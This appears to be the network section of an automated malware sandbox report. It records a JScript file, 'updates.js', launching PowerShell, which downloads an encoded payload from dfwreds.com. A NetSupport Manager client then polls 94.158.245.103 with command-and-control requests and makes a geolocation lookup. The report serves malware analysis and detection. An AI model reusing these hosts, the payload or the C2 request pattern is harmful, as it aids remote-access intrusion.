                                                                            Jul 16, 2024 22:29:52.723858118 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.723897934 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.723900080 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.723918915 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.723933935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.723952055 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.723984957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724020958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724045038 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.724067926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.724093914 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724127054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724144936 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.724160910 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724195004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724209070 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.724240065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724275112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724286079 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.724308968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.724358082 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.806530952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806566954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806602001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806655884 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.806677103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806710958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806730986 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.806744099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806778908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806785107 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.806832075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.806879044 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.806962013 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807375908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807410002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807425022 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.807461977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807503939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807509899 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.807660103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807693005 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807703972 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.807759047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807789087 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807806015 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.807821989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807873011 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.807912111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807943106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.807990074 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.807992935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808026075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808059931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808072090 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.808105946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808155060 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.808156967 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808191061 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808238029 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.808252096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808320045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808353901 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808365107 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.808386087 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808418989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808430910 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.808458090 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808504105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.808522940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.808556080 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901154995 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901163101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901186943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901221037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901231050 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901252031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901284933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901299953 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901336908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901370049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901381969 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901406050 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901438951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901452065 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901475906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901508093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901524067 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901541948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901573896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901587009 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901607037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901640892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901669979 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901674986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901706934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901714087 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901741028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901772976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901783943 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901807070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901839018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901849031 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.901875019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.901917934 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.902086973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902184010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902216911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902228117 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.902250051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902282000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902314901 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902348042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902348995 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.902374029 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.902380943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902416945 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.902424097 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.947247028 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.984461069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984536886 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984570026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984586954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.984602928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984636068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984661102 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.984668970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984703064 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984711885 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.984735966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.984786034 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.985263109 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985295057 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985327959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985340118 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.985410929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985443115 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985455990 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.985476017 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985507965 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985517025 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.985543013 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985591888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.985621929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985656023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985701084 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.985707045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985738039 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985769987 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985780954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.985802889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985835075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.985846996 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.986938953 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.986972094 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987010956 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987024069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987056017 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987072945 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987108946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987142086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987150908 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987174988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987209082 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987221003 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987257957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987289906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987320900 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987323046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987356901 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987370968 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987407923 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987456083 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987458944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987535000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987566948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987582922 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987601042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987632990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987648964 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987665892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987699986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987718105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987768888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987801075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987831116 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.987834930 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.987895012 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.988663912 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.988696098 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.988729000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.988744974 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.988801003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.988832951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.988851070 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.988866091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.988900900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.988905907 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.989068031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.989125967 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:53.985197067 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:54.153542995 CEST49731443192.168.2.494.158.245.103
                                                                            Jul 16, 2024 22:29:54.153589010 CEST4434973194.158.245.103192.168.2.4
                                                                            Jul 16, 2024 22:29:54.153656960 CEST49731443192.168.2.494.158.245.103
                                                                            Jul 16, 2024 22:29:54.264338017 CEST49731443192.168.2.494.158.245.103
                                                                            Jul 16, 2024 22:29:54.264419079 CEST4434973194.158.245.103192.168.2.4
                                                                            Jul 16, 2024 22:29:54.264615059 CEST4434973194.158.245.103192.168.2.4
                                                                            Jul 16, 2024 22:29:54.302865982 CEST4973280192.168.2.4104.26.0.231
                                                                            Jul 16, 2024 22:29:54.307849884 CEST8049732104.26.0.231192.168.2.4
                                                                            Jul 16, 2024 22:29:54.307933092 CEST4973280192.168.2.4104.26.0.231
                                                                            Jul 16, 2024 22:29:54.308444977 CEST4973280192.168.2.4104.26.0.231
                                                                            Jul 16, 2024 22:29:54.313720942 CEST8049732104.26.0.231192.168.2.4
                                                                            Jul 16, 2024 22:29:54.986241102 CEST8049732104.26.0.231192.168.2.4
                                                                            Jul 16, 2024 22:29:54.986480951 CEST4973280192.168.2.4104.26.0.231
                                                                            Jul 16, 2024 22:31:44.200093031 CEST4973280192.168.2.4104.26.0.231
                                                                            Jul 16, 2024 22:31:44.206437111 CEST8049732104.26.0.231192.168.2.4
                                                                            Jul 16, 2024 22:31:44.206499100 CEST4973280192.168.2.4104.26.0.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 16, 2024 22:29:47.769463062 CEST | 58012 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 22:29:48.775588989 CEST | 58012 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 22:29:48.858393908 CEST | 53 | 58012 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 22:29:48.858442068 CEST | 53 | 58012 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 22:29:54.265010118 CEST | 56948 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 22:29:54.276545048 CEST | 53 | 56948 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 22:30:06.109138012 CEST | 53 | 63606 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 16, 2024 22:29:47.769463062 CEST | 192.168.2.4 | 1.1.1.1 | 0x3008 | Standard query (0) | dfwreds.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 22:29:48.775588989 CEST | 192.168.2.4 | 1.1.1.1 | 0x3008 | Standard query (0) | dfwreds.com | A (IP address) | IN (0x0001) | false
Jul 16, 2024 22:29:54.265010118 CEST | 192.168.2.4 | 1.1.1.1 | 0x43d0 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 16, 2024 22:29:48.858393908 CEST | 1.1.1.1 | 192.168.2.4 | 0x3008 | No error (0) | dfwreds.com | | 23.227.193.59 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 22:29:48.858442068 CEST | 1.1.1.1 | 192.168.2.4 | 0x3008 | No error (0) | dfwreds.com | | 23.227.193.59 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 22:29:54.276545048 CEST | 1.1.1.1 | 192.168.2.4 | 0x43d0 | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 22:29:54.276545048 CEST | 1.1.1.1 | 192.168.2.4 | 0x43d0 | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 22:29:54.276545048 CEST | 1.1.1.1 | 192.168.2.4 | 0x43d0 | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
• dfwreds.com
• 94.158.245.103 connection: keep-alive cmd=poll info=1 ack=1
• geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 23.227.193.59 | 80 | 7424 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Jul 16, 2024 22:29:48.873991966 CEST | 75 | OUT | GET /data.php?14991 HTTP/1.1
Host: dfwreds.com
Connection: Keep-Alive
Jul 16, 2024 22:29:49.385452032 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 20:29:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
                                                                            Jul 16, 2024 22:29:49.385682106 CEST672INData Raw: 37 39 2b 37 68 2f 66 76 33 73 57 38 6f 6e 4b 38 66 76 34 55 53 6f 4e 36 34 58 59 37 4a 66 39 50 59 5a 50 6d 34 61 69 4a 61 6e 67 69 4e 68 4b 4c 61 68 46 7a 38 67 72 78 48 74 6d 37 66 2b 38 75 5a 75 66 6b 59 58 37 46 51 7a 79 64 74 67 6d 33 32 71
                                                                            Data Ascii: 79+7h/fv3sW8onK8fv4USoN64XY7Jf9PYZPm4aiJangiNhKLahFz8grxHtm7f+8uZufkYX7FQzydtgm32qnQnK35dHY5/wJMoTF+9y717959blNu9z7mFlVi5hIh12FzS9O6SRT7pSL9Bv20006V8z/jnn3/YX7wrPjX+Hd9HxPcNDHeQ69tQPF/2wTAk7FLMLewjPjJwQcPHuCD+/cxv6QSb1w8g0nBvTB6ImC8UP8p7On
                                                                            Jul 16, 2024 22:29:49.385858059 CEST1236INData Raw: 69 48 39 52 6d 2f 50 2f 49 6e 67 70 2f 4c 76 33 77 55 52 33 4c 66 36 75 32 67 53 30 54 34 75 69 64 33 38 71 76 70 48 2f 48 46 6f 44 35 42 42 48 68 57 58 56 65 4f 76 79 57 55 79 6d 50 56 63 4d 7a 65 6b 4a 49 6f 4f 57 62 64 44 39 65 4e 70 48 52 44
                                                                            Data Ascii: iH9Rm/P/Ingp/Lv3wUR3Lf6u2gS0T4uid38qvpH/HFoD5BBHhWXVeOvyWUymPVcMzekJIoOWbdD9eNpHRDtp4sXDyRTbyznHT4Oiynq8cEiKsR4GGEd7zARh623EOqlg2uzW+d8XKeI6CR56zeruoNif7KXg3+Cf4/9F8E/z/wvxX1BaiXn5+ZhLsTmXfKCovAb//P3Xv+HfABPp/jbaQx78Jph8iM0hCh9qAuZXDb6lBPGfm19
                                                                            Jul 16, 2024 22:29:49.385875940 CEST1236INData Raw: 6e 32 4d 4b 43 67 6f 62 66 49 65 6c 69 36 75 66 77 4c 2f 50 30 2f 50 2f 4a 50 79 62 2f 46 73 4f 48 59 71 75 48 6c 37 45 2f 77 66 79 76 32 64 34 47 72 59 4e 52 41 5a 38 33 58 31 57 75 68 4a 4c 4b 64 34 58 6c 35 52 67 55 56 46 52 49 2f 2f 58 4c 68
                                                                            Data Ascii: n2MKCgobfIeli6ufwL/P0/P/JPyb/FsOHYquHl7E/wfyv2d4GrYNRAZ83X1WuhJLKd4Xl5RgUVFRI//XLhL/vYl/4s/LqKEey+8MG4S5D+5hWVUt6cvHuxzEI60lCopKcd9iF25fziXjUB130ho+j+yXlJYTd819oKikFLPv3cXUGf25f0m9jXk91javO9eqRf5Lqh/ioRU+XEcqatfsGVOJ+x0+RsS/BvGv9tz8vwjaiv//Ev/
                                                                            Jul 16, 2024 22:29:49.390364885 CEST1236INData Raw: 34 38 66 34 5a 39 79 50 48 54 73 57 6d 52 38 6f 38 61 7a 38 2f 6c 4f 2b 30 38 43 2f 71 42 2b 6d 65 4f 6e 78 73 64 67 6d 38 4b 62 35 33 41 48 77 51 75 6f 61 50 6e 59 72 57 44 79 6d 47 46 42 4f 6e 4e 62 51 2b 69 7a 6e 39 6d 58 63 4f 65 4d 44 54 4c
                                                                            Data Ascii: 48f4Z9yPHTsWmR8o8az8/lO+08C/qB+meOnxsdgm8Kb53AHwQuoaPnYrWDymGFBOnNbQ+izn9mXcOeMDTLCntbi4I967chqrmZ8oeG9AeQX3l+ObQjDeWZVz/7dtexlx3zu+aQatF2uxvKqK+1HTmEJhHa+f2kNtd8B4igPMF0pKWJvlDTosXUVtH/3Gl+YnTXomo2bt7JSQD0hMnor/F8XL8oVhw4eju6cYl3D+DRTvtw3gbaT


Session ID:1
Source IP:192.168.2.4
Source Port:49731
Destination IP:94.158.245.103
Destination Port:443
PID:7608
Process:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe

Timestamp:Jul 16, 2024 22:29:54.264338017 CEST
Bytes transferred:220
Direction:OUT
Data:
POST http://94.158.245.103/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 94.158.245.103
Connection: Keep-Alive

CMD=POLL
INFO=1
ACK=1
                                                                            Data Raw:
                                                                            Data Ascii:


Session ID:2
Source IP:192.168.2.4
Source Port:49732
Destination IP:104.26.0.231
Destination Port:80
PID:7608
Process:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe

Timestamp:Jul 16, 2024 22:29:54.308444977 CEST
Bytes transferred:118
Direction:OUT
Data:
GET /location/loca.asp HTTP/1.1
                                                                            Host: geo.netsupportsoftware.com
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache

Timestamp:Jul 16, 2024 22:29:54.986241102 CEST
Bytes transferred:935
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                            Date: Tue, 16 Jul 2024 20:29:54 GMT
                                                                            Content-Type: text/html; Charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            CF-Ray: 8a44bf40fbfb72b6-EWR
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: private
                                                                            Set-Cookie: ASPSESSIONIDSQQQBSDC=IFPBDAEDNBAFCBIHKENAOEJI; path=/
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                            Vary: Accept-Encoding
                                                                            cf-apo-via: origin,host
                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQgBunYVMWADp8NyCXN9DaMz9ir0PVCnqDu8wtOt%2F1nRDT1KFN%2BEKFprkehrzhd8ageLegEa6Atp2KyF42H1miXYW%2BTZKKgS5qE4nhTeY%2BjY2BFrdhy26YXmGQohUiJggd0HOLHmP1PT2oei"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 1040.7357,-74.17240



                                                                            Target ID:0
                                                                            Start time:16:29:40
                                                                            Start date:16/07/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
                                                                            Imagebase:0x7ff7ab6f0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
